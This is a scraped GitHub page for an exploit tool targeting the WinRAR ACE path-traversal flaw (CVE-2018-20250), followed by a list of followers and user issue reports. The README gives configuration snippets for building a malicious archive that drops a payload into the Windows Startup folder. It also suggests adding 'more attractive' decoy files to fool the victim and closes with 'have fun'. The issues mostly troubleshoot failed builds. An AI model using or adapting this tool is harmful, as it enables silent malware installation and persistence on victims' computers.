wyatu / cve-2018-20250 Goto Github PK

exp for https://research.checkpoint.com/extracting-code-execution-from-winrar

Python 100.00%

cve-2018-20250's Introduction

exp for Extracting Code Execution From Winrar

poc by Ridter

how to use ?

you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, this exp script will generate the evil archive file automatically!

set the values you want

... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...

run the exp, exp generated the test.rar automatically

if the victim opens the test.rar, he will see the file hello.txt and world.txt, you can also add more files, more attractive files.

when he unpacks the file, the victim's user startup directory will have one more file named hi.exe, actually it's a calc.exe. when he restart the computer, the hi.exe will run.

have fun! :)

cve-2018-20250's People

Stargazers

Watchers

Forkers

bigbigx bloodandwolf wooyunvip lxkxc 1337g wu860 huangyuan666 tr33-he11 m4d3bug wyp773029248 88hack p3t3rp4rk3r zfqajd grayguest ineedbackup vineshchauhan24 sry309 artofwar344 wuyishonvdemeng f1uyu4n grant555 fuckup1337 wj158 inetsec sheng9527 injekt666 vantier r0ckylua trevor3000 chrispaul2019 fengjixuchui c002 kaisaryousuf hyabcd xrahitel d0t451 chennqqi styxschip pigcanfly2018 lily110 foolboy365 naluhd binddns opabravo h3llozy sirzhangsheng test123test111 xmdda venstone skyroot 0x0kasaku raysonmeng jiohb shellfeel ormicron lhtest429 02husky mellan pythonone dridioussama raystyle kuteminh11 binlmmhc hkylin guwudoor ntgitdude23 xunruteam ibrahim3ly xsec thx0701 spankders keystroke95 cflive mother2110 snowmois redwifiteam k1ns0 testtz ztencmcp buzzdao hsecure vpandaxjl xiaominghi stop1992 natto97 4chr4f wandoelmo lyltxmy bailongwang1 b-xiang enhboldh tuotujingshui mm0x00 newbieh4cker threst l9sk antonyflour ho3eink hworm umbrell4

cve-2018-20250's Issues

Error

https://gyazo.com/43f7e4e8a786a78bd0035275f07053ed

when i extract the rar i get this

https://gyazo.com/0938846666d91c1f11b48a3de946c76b

Archive is either in unknown format or damaged

Using WinRAR version 4.20. Running the generated RAR file on Windows 10 x64 1809 results in this error when opening/extracting the archive.

"Cannot create C:\C:C:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe"

Odd-length string

Hi there, I'm not sure why there has this error when I want to generate a rar file:

Could you give a little help? Many thanks.

TypeError: Non-hexadecimal digit found Shellcode

[*] Start to generate the archive file best.rar...
Traceback (most recent call last):
File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 114, in
build_file_once(filename_list[i])
File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 102, in build_file_once
build_file_add(shellcode, rar_filename)
File "C:\Users\Uncle Tom\Desktop\hack-winrar\exp.py", line 98, in build_file_add
f.write(binascii.a2b_hex(shellcode.upper()))
TypeError: Non-hexadecimal digit found

Using Windows OS

TypeError: Non-hexadecimal digit found

I get this error. Any help please. Attached image of cmd

what if victim does not extract file in Desktop ?

Its not that simple , one thing to mention about this script is that the victim should extract zip file in Desktop to through "../" zip can access the appdata inside of %USERNAME% without knowing the actual username !
so what if it would be extracted anywhere else ? how a zip file could access username for extraction ?

Error 3

[*] Start to generate the archive file Tet.rar... 'py' is not recognized as an internal or external command, operable program or batch file. Traceback (most recent call last): File "exp.py", line 114, in <module> build_file_once(filename_list[i]) File "exp.py", line 103, in build_file_once shellcode_new = modify_hdr_crc(shellcode, rar_filename) File "exp.py", line 58, in modify_hdr_crc hdr_crc_raw = get_right_hdr_crc(filename) File "exp.py", line 54, in get_right_hdr_crc right_hdr_crc = result[0].upper() IndexError: list index out of range

ERROR on python 3.70 test.rar: CorruptedArchiveError: header CRC failed

ERROR on python 3.70 test.rar: CorruptedArchiveError: header CRC failed whats header reg?

error: unable to create process --- acefile.py --headers test.rar

when i run your script this error shown:
F:\test winrar\37>python exp.py
[*] Start to generate the archive file test.rar...
Unable to create process using '"C:\Program Files\Python37\python.exe" acefile.py --headers test.rar'
Traceback (most recent call last):
File "exp.py", line 114, in
build_file_once(filename_list[i])
File "exp.py", line 103, in build_file_once
shellcode_new = modify_hdr_crc(shellcode, rar_filename)
File "exp.py", line 58, in modify_hdr_crc
hdr_crc_raw = get_right_hdr_crc(filename)
File "exp.py", line 54, in get_right_hdr_crc
right_hdr_crc = result[0].upper()
IndexError: list index out of range

Cant extract archive : Archive is either in unknown format or damaged

test.rar: CorruptedArchiveError: header CRC failed
test.rar: CorruptedArchiveError: header CRC failed
test.rar: CorruptedArchiveError: header CRC failed
[+] Evil archive file test.rar generated successfully

is it possible to set an archive password?

question in title

Error 2

Hi,
When run exp.py this error shown:

C:\Users\05\Desktop\New folder\CVE-2018-20250-master>py -3 exp.py
[*] Start to generate the archive file test.rar...
Traceback (most recent call last):
File "exp.py", line 111, in
build_file(shellcode_head, rar_filename)
File "exp.py", line 93, in build_file
with open(filename, "wb") as f:
FileNotFoundError: [Errno 2] No such file or directory: 'test.rar'

Creating AppData folder in C:/AppData?

Is it meant to create an AppData folder as C:/AppData?

zip protected

i fixed the problem what i faced.

Error Bad File Descriptor

[*] Start to generate the archive file test.rar...
Traceback (most recent call last):
File "exp.py", line 111, in
build_file(shellcode_head, rar_filename)
File "exp.py", line 94, in build_file
f.write(binascii.a2b_hex(shellcode.upper()))
OSError: [Errno 9] Bad file descriptor

Any help to fix that Error?

Unpacking ¯\(°_o)/¯

When unpacking, hi.exe is unpacked by creating another copy of the AppData folder on the desktop. Must be "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup". It turns out "C:\Users\user\ Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
WinRar 5.61 release.

Not working after update 5.70

Thanks for the source , i tested with winrar version 5.61 and it worked but after the update to 5.70
you will get error msg winrar corrupted or damaged